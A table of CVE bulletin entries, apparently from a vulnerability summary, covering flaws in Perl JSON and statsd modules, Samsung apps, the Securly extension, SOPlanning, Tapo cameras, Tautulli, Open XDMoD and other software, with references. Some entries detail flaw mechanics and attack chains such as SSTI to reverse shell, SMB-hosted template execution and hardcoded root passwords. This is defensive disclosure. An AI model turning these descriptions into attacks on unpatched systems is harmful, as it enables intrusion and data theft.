| RURBAN--Cpanel::JSON::XS | Cpanel::JSON::XS versions before 4.41 for Perl allow type confusion via duplicate object keys when dupkeys_as_arrayref is enabled. decode_hv() collapses duplicate object keys into an array reference under dupkeys_as_arrayref. The branch reached for a duplicate key tests `SvTYPE (old_value) != SVt_RV && SvTYPE (SvRV (old_value)) != SVt_PVAV`, which evaluates SvRV(old_value) before establishing that old_value is a reference. When the existing value is a plain scalar rather than an array reference, a non-reference scalar is dereferenced as a reference. A caller decoding untrusted JSON with dupkeys_as_arrayref enabled is crashed, and the incompatible access follows a pointer taken from attacker controlled scalar contents. | 2026-06-03 | not yet calculated | CVE-2026-9334 | https://github.com/rurban/Cpanel-JSON-XS/commit/11a7c550a0d8fac2f84414f24d5df9b2bfe346e2.patch https://metacpan.org/release/RURBAN/Cpanel-JSON-XS-4.41/changes |
| RURBAN--Cpanel::JSON::XS | Cpanel::JSON::XS versions before 4.41 for Perl allow denial of service via UTF-8 BOM prefixed input when a decode filter callback throws. To skip a leading 3-byte UTF-8 BOM, decode_json() advances the input scalar's string pointer past the mark with SvPV_set() and restores it only on the normal return path. When decoding aborts through a Perl exception, for example a filter_json_object callback that croaks, the restore is skipped and the scalar is left with its string pointer offset into its own buffer and a shortened length. When that scalar is later freed, the allocator receives an invalid pointer and the interpreter aborts. A single BOM prefixed document decoded with a throwing filter callback crashes any caller. | 2026-06-03 | not yet calculated | CVE-2026-9516 | https://github.com/rurban/Cpanel-JSON-XS/commit/dfe1b41a36caba51dc12a2917fe50285d1ffaa7b.patch https://metacpan.org/release/RURBAN/Cpanel-JSON-XS-4.41/changes |
| Samsung Mobile--Samsung Android USB Driver for Windows | Improper input validation in Samsung Android USB Driver for Windows prior to version 1.9.5.0 allows local attacker to access out-of-bounds memory. | 2026-06-05 | not yet calculated | CVE-2026-21038 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Assistant | Improper export of android application components in SmartHomeWidgetReceiver of Samsung Assistant prior to version 9.3.14 allows local attacker to execute arbitrary script. | 2026-06-05 | not yet calculated | CVE-2026-21032 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Assistant | Improper export of android application components in ExpressHomeWidgetReceiver of Samsung Assistant prior to version 9.3.14 allows local attacker to execute arbitrary script. | 2026-06-05 | not yet calculated | CVE-2026-21033 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Auto | Improper export of android application components in Samsung Auto prior to version 3.1.2.61 in Android 15 and 3.2.0.38 in Android 16 allows local attacker to change audio configuration. | 2026-06-05 | not yet calculated | CVE-2026-21034 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Internet | Improper authorization in Samsung Internet prior to version 30.0.0.39 allows local attackers to access sensitive information. | 2026-06-05 | not yet calculated | CVE-2026-21036 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Members | Improper input validation in Samsung Members prior to version 5.8.01.5 allows local attackers to access arbitrary URL and launch arbitrary activity with Samsung Members privilege. | 2026-06-05 | not yet calculated | CVE-2026-21037 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper handling of insufficient privileges in SecTelephonyProvider prior to SMR Jun-2026 Release 1 allows local attackers to access privileged files. | 2026-06-05 | not yet calculated | CVE-2026-21017 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Incorrect privilege assignment in Telephony prior to SMR Jun-2026 Release 1 allows local attackers to access sensitive information. | 2026-06-05 | not yet calculated | CVE-2026-21025 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper export of android application components in SpriteWallpaper prior to SMR Jun-2026 Release 1 allows local attackers to access sensitive information. | 2026-06-05 | not yet calculated | CVE-2026-21026 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper export of android application components in ImsSettings prior to SMR Jun-2026 Release 1 allows local attackers to trigger logging function. | 2026-06-05 | not yet calculated | CVE-2026-21027 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper access control in AuditLogService prior to SMR Jun-2026 Release 1 allows local attackers to access sensitive information. | 2026-06-05 | not yet calculated | CVE-2026-21028 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper export of android application components in Galaxy Editing Service prior to SMR Jun-2026 Release 1 allows local attacker to execute privileged operations. | 2026-06-05 | not yet calculated | CVE-2026-21029 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper access control in MediaTek Audio HAL prior to SMR Jun-2026 Release 1 allows local attackers to trigger privileged functions. | 2026-06-05 | not yet calculated | CVE-2026-21030 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Mobile Devices | Improper authorization in AppBlock prior to SMR Jun-2026 Release 1 allows local attacker to launch arbitrary activity. User interaction is required for triggering this vulnerability. | 2026-06-05 | not yet calculated | CVE-2026-21031 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=06 |
| Samsung Mobile--Samsung Plus TV | Improper input validation in Samsung Plus TV prior to version 1.0.28.6 allows remote attackers to access sensitive information. | 2026-06-05 | not yet calculated | CVE-2026-21035 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=06 |
| SANBEG--Etsy::StatsD | Etsy::StatsD versions through 1.002002 for Perl allow metric injections. The metric names and values are not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics. Note that the git repository contains an unreleased version with the gauge and set methods that also do not check for potential metric injections. | 2026-06-04 | not yet calculated | CVE-2026-46741 | https://www.cve.org/CVERecord?id=CVE-2026-46719 https://www.cve.org/CVERecord?id=CVE-2026-46720 |
| sanic-cors--sanic-cors | sanic-cors version 2.2.0 and prior contains an improper regular expression in the try_match() function in sanic_cors/core.py that uses re.match without end-anchoring. This allows an attacker to bypass CORS origin allowlists by registering a domain that begins with a trusted origin string, to gain unauthorized access to cross-origin requests for authenticated resources. | 2026-06-05 | not yet calculated | CVE-2026-37737 | https://github.com/ashleysommer/sanic-cors/blob/master/sanic_cors/core.py https://github.com/ashleysommer/sanic-cors https://pypi.org/project/Sanic-Cors/ https://github.com/npbhatter17/security-advisories/blob/main/CVE-2026-37737-sanic-cors-advisory.md |
| sbabic--SWUpdate | SWUpdate before 2026.05 is affected by a time-of-check time-of-use (TOCTOU) race condition that allows local unprivileged attackers to escalate privileges to root or install untrusted contents using a signed update. | 2026-06-03 | not yet calculated | CVE-2025-41259 | https://github.com/sbaresearch/advisories/tree/public/2025/SBA-ADV-20251206-01_SWUpdate_Untrusted_Script_Execution_via_Signed_Update_TOCTOU https://github.com/sbabic/swupdate/commit/f4bd64260e233e207354d68d572b1cbc3e63689d https://github.com/sbabic/swupdate |
| SeaChest--openSeaChest | Out of bounds write in openSeaChest's Trim/Unmap operation in Seagate's openSeaChest v26.03.0 on all supported platforms: when this operation runs, the structure describing the range of LBAs to deallocate is written 16 bytes beyond the end of its allocated buffer. | 2026-06-02 | not yet calculated | CVE-2026-10718 | https://www.seagate.com/product-security/#security-advisories https://www.seagate.com/support/software/seachest/ |
| SeaChest--openSeaChest | Out of bounds write in openSeaChest's --showSupportedFormats in Seagate's openSeaChest v25.05.3 on all supported platforms allows for writing 1 extra byte outside of allocated memory which sets a value to 1 via a maliciously crafted NVMe device with a bogus value in the namespace FLBAS byte. | 2026-06-02 | not yet calculated | CVE-2026-10719 | https://www.seagate.com/product-security/#security-advisories https://www.seagate.com/support/software/seachest/ |
| Seagate--openSeaChest | Out of bounds writes and reads in openSeaChest's --showSCSIDefects in Seagate's openSeaChest v25.05.3 on all supported platforms allow defect information to be written out of bounds for very large defect lists, triggered either by a drive with a very large number of defects or by a maliciously crafted SCSI device's defect response length. | 2026-06-02 | not yet calculated | CVE-2026-10717 | https://www.seagate.com/product-security/#security-advisories https://www.seagate.com/support/software/seachest/ |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension downloads JSON files containing crisis alert keywords and filtering rules over unencrypted HTTP via the Fetch API. Other endpoints in the same extension correctly fetch IWF and CIPA data over HTTPS, demonstrating an inconsistent implementation of TLS. | 2026-06-03 | not yet calculated | CVE-2026-8874 | https://kb.cert.org/vuls/id/595768 |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension contains hardcoded, plaintext AES passphrases in securly.min.js. These keys decrypt crisis alert keyword data and intervention site data. | 2026-06-03 | not yet calculated | CVE-2026-8876 | https://kb.cert.org/vuls/id/595768 |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension exposes multiple publicly accessible endpoints that allow unauthenticated access to sensitive data. The exposed information consists of SHA-1 hashes that are inadequately obfuscated using a simple Caesar cipher, which can be easily reversed to recover the original hash values and access the protected data. | 2026-06-03 | not yet calculated | CVE-2026-8878 | https://kb.cert.org/vuls/id/595768 |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension dynamically registers content13.min.js as a content script via chrome.scripting.registerContentScripts() at runtime. This script is NOT declared in manifest.json and bypasses Chrome Web Store static security review. It runs on all URLs and immediately hides all page content, creates a full-page overlay, pauses all videos, and only restores content when the service worker confirms the page passes filtering. If Securly's servers are unreachable, pages remain indefinitely hidden. | 2026-06-03 | not yet calculated | CVE-2026-8879 | https://kb.cert.org/vuls/id/595768 |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension uses EVP_BytesToKey key derivation with MD5 and a single iteration for AES encryption. MD5 has been broken since 2004 and a single iteration provides no key stretching. | 2026-06-03 | not yet calculated | CVE-2026-8881 | https://kb.cert.org/vuls/id/595768 |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension downloads config.json over HTTP and compiles server-provided patterns as JavaScript regular expressions via new RegExp() without complexity validation. An on-path attacker can inject specific patterns to cause catastrophic backtracking, resulting in denial of service on all browsing. | 2026-06-03 | not yet calculated | CVE-2026-8888 | https://kb.cert.org/vuls/id/595768 |
| Securly--Securly Chrome Extension | Version 3.0.7 of the Securly Chrome Extension uses deprecated SHA-1 hashing for IWF CSAM URL matching (25,020 hashes) and CIPA blocklist matching (12,352 hashes). | 2026-06-03 | not yet calculated | CVE-2026-8889 | https://kb.cert.org/vuls/id/595768 |
| Shenzhen Tenda Technology--Tenda FH451 V1.0.0.9 | Shenzhen Tenda Technology Co., Ltd Tenda FH451 V1.0.0.9 was discovered to contain a stack-based buffer overflow in the page parameter of the fromDhcpListClient function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request. | 2026-06-05 | not yet calculated | CVE-2026-36785 | https://github.com/xhh0124/SemVulLLM/ https://github.com/xhh0124/SemVulLLM/tree/main/FH451/fromDhcpListClient_0 |
| Simple SA--Wirtualna Uczelnia | Server-Side Template Injection (SSTI) in Wirtualna Uczelnia allows an unauthenticated attacker to perform Remote Code Execution (RCE). In the endpoint redirectToUrl and parameter redirectUrlParameter, insufficient input validation permits injection of arbitrary template expressions that are executed on the server. Successful exploitation can allow an attacker to run remote commands, including establishing a reverse shell. This issue affects Wirtualna Uczelnia versions up to wu#2016.437.295#0#20260327_105545 | 2026-06-02 | not yet calculated | CVE-2026-34906 | https://cert.pl/posts/2026/06/CVE-2026-34906 https://simple.com.pl/branze/edukacyjna/ |
| Simple SA--Wirtualna Uczelnia | Wirtualna Uczelnia is vulnerable to Reflected Cross-Site Scripting (XSS) due to insecure handling of the locale parameter across multiple endpoints. An attacker can craft a malicious URL with JavaScript embedded in the locale parameter and send it to a victim. When the victim opens the link, the injected script will be executed in their browser. This issue affects Wirtualna Uczelnia versions up to wu#2016.437.295#0#20260327_105545 | 2026-06-02 | not yet calculated | CVE-2026-34907 | https://cert.pl/posts/2026/06/CVE-2026-34906 https://simple.com.pl/branze/edukacyjna/ |
| Sony--PS4 | A privilege escalation vulnerability exists in PlayStation 4 firmware versions 13.00 through 13.02. The BD-J (Blu-ray Disc Java) sandbox can be escaped through a malformed JAR file. | 2026-06-02 | not yet calculated | CVE-2025-64390 | https://hackerone.com/reports/3452696 |
| SOPlanning--SOPlanning | SOPlanning does not enforce authorization for backup functionalities. An unauthenticated attacker can directly query backup-related endpoints and retrieve backup archives containing user databases with usernames and password hashes, as well as the config.csv file, which includes additional sensitive information. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40543 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Stored Cross-Site Scripting (XSS) via /process/upload_backup endpoint. An authenticated attacker with access to the backup functionality can upload a crafted ZIP archive containing a malicious user.csv file with embedded JavaScript. The injected code is executed in the victim's browser when a user clicks the Edit button for the malicious backup. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40544 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Reflected XSS via the taches parameter. An attacker can craft a malicious URL which, when opened by authenticated victim, results in arbitrary JavaScript execution in the victim's browser. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40545 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to SQL Injection across multiple endpoints and parameters. An attacker with low privileges can inject arbitrary SQL commands, potentially gaining full control over the database. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40546 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Path Traversal in backup endpoints. An authenticated remote attacker is able to exploit a vulnerable endpoint and construct payloads that allow reading and executing files previously added through the backup functionality. Critically, due to CVE-2026-40543 (Missing Authorization), any backup file can be read by any (unauthorized) user. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40547 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| SOPlanning--SOPlanning | SOPlanning does not verify uploaded file extension. An authenticated attacker with access to the backup functionality can upload a crafted ZIP archive containing a legitimate user.csv file alongside a malicious file, which is extracted on the server. When combined with CVE-2026-40547 (Path Traversal), the malicious file (e.g., a PHP script) can be placed in a web-accessible location and executed via the browser. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40548 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Cross-Site Request Forgery (CSRF) in the groupe_save create, modify and delete endpoints. An attacker can craft a malicious website that, when visited by an authenticated user, automatically sends a forged GET or POST request to the application. This issue affects SOPlanning version 1.55 and below. | 2026-06-01 | not yet calculated | CVE-2026-40549 | https://cert.pl/en/posts/2026/06/CVE-2026-40543 https://www.soplanning.org/en/ |
| sulu--sulu | Sulu is an open-source PHP content management system based on the Symfony framework. Prior to versions 2.6.23 and 3.0.6, the password reset token and API key generation uses a weak cryptographic hash algorithm. This issue has been patched in versions 2.6.23 and 3.0.6. | 2026-06-01 | not yet calculated | CVE-2026-45701 | https://github.com/sulu/sulu/security/advisories/GHSA-7fv8-6pp7-6h85 https://github.com/sulu/sulu/releases/tag/2.6.23 https://github.com/sulu/sulu/releases/tag/3.0.6 |
| Symantec--PC Tools Internet Security | Improper access control in the PCTCore64.sys Windows kernel driver from PC Tools Internet Security allows user-mode processes to access the PCTCoreDriver WDM device interface and invoke privileged IOCTL handlers. A local attacker with the ability to access or load the affected driver can exploit this vulnerability to perform sensitive and privileged operations on the target system. | 2026-06-01 | not yet calculated | CVE-2026-8501 | https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language https://kb.cert.org/vuls/id/158530 |
| T3 Technology--CPE models | Incorrect access control in the web management interface of T3 Technology CPE models T625Pro v1.0.07, T6825G v1.0.03, and T7281 v1.0.03 allows unauthorized attackers to enable the Telnet service via sending a crafted request to a vulnerable CGI component. | 2026-06-04 | not yet calculated | CVE-2026-35904 | https://www.ncsa.or.th https://t3techgroup.com https://www.true.th/ https://github.com/PwnOnu/T3-Technology-CPE-Advisories/blob/main/CVE-2026-35904.md |
| T3 Technology--CPE models | T3 Technology CPE models T625Pro v1.0.07, T6825G v1.0.03, and T7281 v1.0.03 were discovered to contain a hardcoded password for root access under the "superadmin" account. | 2026-06-04 | not yet calculated | CVE-2026-35905 | https://www.ncsa.or.th https://t3techgroup.com https://www.true.th/ https://github.com/PwnOnu/T3-Technology-CPE-Advisories/blob/main/CVE-2026-35905.md |
| T3 Technology--CPE models | An undocumented debug CGI endpoint in T3 Technology CPE models T625Pro v1.0.07 and T6825G v1.0.03 allows unauthenticated attackers to execute arbitrary system commands as root by supplying a crafted HTTP query string. | 2026-06-04 | not yet calculated | CVE-2026-35906 | https://www.ncsa.or.th https://t3techgroup.com https://www.true.th/ https://github.com/PwnOnu/T3-Technology-CPE-Advisories/blob/main/CVE-2026-35906.md |
| Tautulli--Tautulli | Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Prior to version 2.17.1, a path traversal vulnerability in the cache deletion endpoint allows authenticated API access to delete directories outside the configured cache path. This can cause arbitrary data loss and service disruption. Version 2.17.1 fixes the issue. | 2026-06-04 | not yet calculated | CVE-2026-40605 | https://github.com/Tautulli/Tautulli/security/advisories/GHSA-fg46-xx7h-mhwr https://github.com/Tautulli/Tautulli/releases/tag/v2.17.1 |
| Tautulli--Tautulli | Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Versions prior to 2.17.1 are vulnerable to remote code execution via the newsletter custom template directory feature. On a fresh install before the setup wizard is completed, all management endpoints are completely unauthenticated. An attacker can create a newsletter agent, point the custom template directory to an attacker-controlled SMB share serving a malicious Mako template, and trigger execution via the newsletter render endpoint, all with zero credentials and no local access to the target system. On a completed install with credentials configured, the same chain is exploitable by any admin. Version 2.17.1 fixes the issue. | 2026-06-04 | not yet calculated | CVE-2026-41065 | https://github.com/Tautulli/Tautulli/security/advisories/GHSA-68qx-mcf5-3jcp https://github.com/Tautulli/Tautulli/releases/tag/v2.17.1 |
| TEAM--Net::Async::Statsd::Client | Net::Async::Statsd::Client versions through 0.005 for Perl allow metric injections. The metric names are not checked for newlines, colons or pipes. Metrics generated from untrusted sources could inject additional statsd metrics. | 2026-06-03 | not yet calculated | CVE-2026-8722 | https://www.cve.org/CVERecord?id=CVE-2026-46719 https://www.cve.org/CVERecord?id=CVE-2026-46720 |
| TECNO Mobile--com.transsion.aiassistantlifestyle | Cross-Site Scripting (XSS) in GeniexWebView component in Transsion AI Assistant Lifestyle application (com.transsion.aiassistantlifestyle) all versions on Android allows remote attacker to execute arbitrary JavaScript in the WebView context via crafted web_action_data URL parameter. | 2026-06-02 | not yet calculated | CVE-2026-10510 | https://security.tecno.com/SRC/securityUpdates |
| Teltonika Networks--RUTOS | In Teltonika Networks RUTOS devices, running versions 7.22 through 7.23.2 and TSWOS devices running versions 1.09 through 1.09.1, due to unsafe calls to an eval function in rpc-profile, a vulnerability exists where a lower privileged user could perform command injection as the root user. | 2026-06-05 | not yet calculated | CVE-2026-8914 | https://www.teltonika-networks.com/support/security-centre |
| The Vinyl Cache Project--Vinyl Cache | In Vinyl Cache before 9.0.1 and Varnish Cache before 9.0.3, a deficiency in HTTP/2 request parsing can be exploited to launch a backend request desync attack (request smuggling), which in turn can be used for cache poisoning, authentication bypass, or possibly even information disclosure and manipulation. The attack vector only exists if HTTP/2 support is enabled by setting the feature parameter to contain +http2. HTTP/2 support is disabled by default. | 2026-06-03 | not yet calculated | CVE-2026-50052 | https://vinyl-cache.org/security/VSV00019.html |
| Thinkst Applied Research--Canarytokens | An HTML injection vulnerability in the notification email for "Slow Redirect" and "Cloned Website" Canarytokens exists in Thinkst Applied Research Canarytokens, enabling Interface Manipulation and Cross-Site Scripting (XSS) in email clients that render HTML emails. This issue affects Canarytokens: from Docker tag sha-c42435e before sha-bfda4df, from Git commit c42435e before bfda4df. | 2026-06-03 | not yet calculated | CVE-2026-10729 | https://github.com/thinkst/canarytokens/security/advisories/GHSA-hmjv-pj8j-8fg7 |
| TP-Link Systems Inc.--Tapo C200 v5 | TP-Link Tapo C200 v5 contains a stack-based buffer overflow flaw in RTSP authentication handling due to improper validation of Authorization header field lengths, which can be triggered by a crafted authentication request. Successful exploitation causes the affected RTSP core service process to crash and triggers an automatic system reboot, resulting in a denial of service (DoS) condition. This prevents legitimate users from accessing the camera's live video stream or management interface until the service restarts. | 2026-06-02 | not yet calculated | CVE-2026-1871 | https://www.tp-link.com/us/support/download/tapo-c200/v5/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c200/v5/#Firmware-Release-Notes https://www.tp-link.com/kr/support/download/tapo-c200/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5113/ |
| TP-Link Systems Inc.--Tapo C520WS v2 | On Tapo C520WS v2, restricted accounts (for example, hub users) are intended to execute only a limited set of low-sensitivity operations. Due to a logic flaw in the device's API authorization mechanism, an attacker can craft requests that leverage legitimate "method mapping" behavior to bypass whitelist restrictions, allowing restricted operations to be masked as permitted requests and executed. Successful exploitation may allow an attacker (with access to a restricted account) to execute unauthorized sensitive operations. Depending on the operation invoked, impact could include device resets, unintended configuration changes, or disruption of normal operation, leading to loss of availability and integrity of the device. | 2026-06-05 | not yet calculated | CVE-2026-34123 | https://www.tp-link.com/us/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5120/ |
| TP-Link Systems Inc.--Tapo C520WS v2 | A stack-based buffer overflow vulnerability exists in Tapo C520WS v2 in the ONVIF CreateUsers service, where the device fails to properly validate the number of XML user nodes during request processing. An authenticated attacker can send a specially crafted ONVIF request containing an excessive number of user entries to trigger memory corruption. Successful exploitation may cause the ONVIF management service to terminate unexpectedly, resulting in a denial-of-service (DoS) condition that disrupts device configuration and management functions. | 2026-06-05 | not yet calculated | CVE-2026-6239 | https://www.tp-link.com/us/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5120/ |
| TP-Link Systems Inc.--Tapo C520WS v2 | A stack-based buffer overflow vulnerability exists in Tapo C520WS v2 in the ONVIF DeleteUsers service, due to insufficient boundary checks when handling multiple user deletion parameters. An authenticated attacker can send a crafted malicious request containing an excessive number of identifiers to overflow stack memory. Successful exploitation may result in a service crash or deadlock, leading to DoS affecting device management and monitoring functionality. | 2026-06-05 | not yet calculated | CVE-2026-6240 | https://www.tp-link.com/us/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5120/ |
| TP-Link Systems Inc.--Tapo C520WS v2 | An authenticated format string vulnerability is present in the ONVIF AddScopes service in Tapo C520WS v2, where user-controlled input is improperly passed to formatting functions without adequate sanitization. An attacker can inject format specifiers into ONVIF scope parameters to manipulate memory handling behavior. Successful exploitation may cause the ONVIF management service to crash, resulting in a DoS condition that impacts normal device operation. | 2026-06-05 | not yet calculated | CVE-2026-6241 | https://www.tp-link.com/us/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5120/ |
| TP-Link Systems Inc.--Tapo C520WS v2 | An authenticated format string vulnerability exists in the ONVIF Subscribe service in Tapo C520WS v2 due to improper handling of externally supplied parameters within formatting functions. An attacker may inject crafted format strings into event subscription requests or notification generation path to disrupt normal service execution. Successful exploitation may cause the event notification service to terminate unexpectedly, resulting in the loss of real-time alarm functionality and disruption of event notifications. | 2026-06-05 | not yet calculated | CVE-2026-6242 | https://www.tp-link.com/us/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c520ws/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5120/ |
| TP-Link Systems Inc.--Tapo C520WS v2 | A denial-of-service vulnerability exists in the RTSP server component of TP-Link Tapo C520WS v2 due to improper handling of syntactically invalid input. Crafted inputs can trigger a processing error, causing the RTSP service to enter non-responsive state. Successful exploitation may cause the RTSP in a denial-of-service condition. | 2026-06-05 | not yet calculated | CVE-2026-8714 | https://www.tp-link.com/us/support/download/tapo-c520ws/v2/#Firmware-Release-Notes https://www.tp-link.com/en/support/download/tapo-c520ws/v2/#Firmware-Release-Notes https://www.tp-link.com/us/support/faq/5118/ |
| transmission--transmission | transmission through 4.1.1 was found to have a clickjacking weakness in the browser-facing WebUI and RPC response paths. | 2026-06-02 | not yet calculated | CVE-2026-38978 | https://github.com/transmission/transmission/pull/8747 https://github.com/transmission/transmission/commit/6b24c1c214ec6a44fa5fdff0ce7da6b16d8ecaa8 https://github.com/transmission/transmission/issues/8726 |
| Tychon--Tychon | Tychon includes an OpenSSL component that specifies an OPENSSLDIR variable as a subdirectory that may be controllable by an unprivileged user on Windows. Tychon contains a privileged service that uses this OpenSSL component. A user who can place a specially-crafted openssl.cnf file at an appropriate path may be able to achieve arbitrary code execution with SYSTEM privileges. | 2026-06-01 | not yet calculated | CVE-2022-4991 | https://www.kb.cert.org/vuls/id/730007 |
| ubccr--xdmod | OpenXDMoD is an open framework for collecting and analyzing HPC metrics. Prior to version 11.0.3, a flaw in Open XDMoD's access control logic allows an attacker to submit a crafted HTTPS POST request that sets a session variable used for authorization decisions. If an installation of Open XDMoD includes the optional Job Performance (SUPReMM) module, an attacker could bypass intended data access restrictions and view other users' compute job efficiency metrics. All deployments of Open XDMoD prior to version 11.0.3 that contain the optional Job Performance (SUPReMM) module are impacted. This issue was reported privately on 2026-04-06, and at this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 11.0.3 on 2026-05-12. As a workaround, apply the patch manually. | 2026-06-05 | not yet calculated | CVE-2026-45776 | https://github.com/ubccr/xdmod/security/advisories/GHSA-3hfh-m242-8rmh https://github.com/ubccr/xdmod/releases/tag/v11.0.3-2 https://open.xdmod.org/security_patches/GHSA-3hfh-m242-8rmh-0_0_0-11_0_2.patch |
| ubccr--xdmod | OpenXDMoD is an open framework for collecting and analyzing HPC metrics. Starting in version 9.5.0 and prior to version 11.0.3, an attacker can remotely execute arbitrary system commands on the web server hosting Open XDMoD with the privileges of the web server process. This could allow an attacker to read or modify application data, alter system configuration, or disrupt service availability. All deployments of Open XDMoD versions 9.5.0 through 11.0.2 (inclusive) are impacted. This issue was reported privately on 2026-04-06, and at this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 11.0.3 on 2026-05-12. As a workaround, apply the patch manually. | 2026-06-05 | not yet calculated | CVE-2026-45777 | https://github.com/ubccr/xdmod/security/advisories/GHSA-29qm-7w4v-43fw https://github.com/ubccr/xdmod/releases/tag/v11.0.3-2 https://open.xdmod.org/security_patches/GHSA-29qm-7w4v-43fw-9_5_0-11_0_2.patch |
| ubccr--xdmod | OpenXDMoD is an open framework for collecting and analyzing HPC metrics. Prior to version 11.0.3, an authenticated attacker can inject malicious JavaScript into their Open XDMoD user profile and abuse the password reset functionality to email a link to an HTML page, which when visited by the victim, reflects and executes the unsanitized payload in the victim's browser, potentially leading to credential capture and Open XDMoD account takeover. All deployments of Open XDMoD prior to 11.0.3 are impacted. This issue was reported privately on 2026-04-06, and at this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 11.0.3 on 2026-05-12. As a workaround, apply the patch manually. | 2026-06-05 | not yet calculated | CVE-2026-45778 | https://github.com/ubccr/xdmod/security/advisories/GHSA-3pv7-qvc3-h527 |
| ubccr--xdmod | OpenXDMoD is an open framework for collecting and analyzing HPC metrics. An SQL injection vulnerability exists in Open XDMoD versions prior to 10.0.3 that allows an unauthenticated remote attacker to execute arbitrary SQL statements. Exploitation requires no authentication or user interaction and can result in complete compromise of the underlying database. All deployments of Open XDMoD prior to 10.0.3 are impacted. This issue was discovered on 2023-08-03 and patched on 2023-08-04. At this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 10.0.3 on 2023-08-04. As a workaround, apply the patch manually. | 2026-06-05 | not yet calculated | CVE-2026-45779 | https://github.com/ubccr/xdmod/security/advisories/GHSA-r33r-6g3c-r992 https://github.com/ubccr/xdmod/releases/tag/v10.0.3 https://open.xdmod.org/security_patches/GHSA-r33r-6g3c-r992-0_0_0-8_6_0.patch https://open.xdmod.org/security_patches/GHSA-r33r-6g3c-r992-9_0_0-10_0_2.patch |
| Unknown--Really Simple Security | The Really Simple Security WordPress plugin before 9.5.10.1 does not enforce the second-factor challenge in two of its two-factor authentication REST endpoints, allowing an attacker who knows a user's password to obtain a WordPress authentication session for that user without completing the email OTP challenge. | 2026-06-02 | not yet calculated | CVE-2026-8293 | https://wpscan.com/vulnerability/1de69ef9-6226-4292-8e36-b331a37f043e/ |
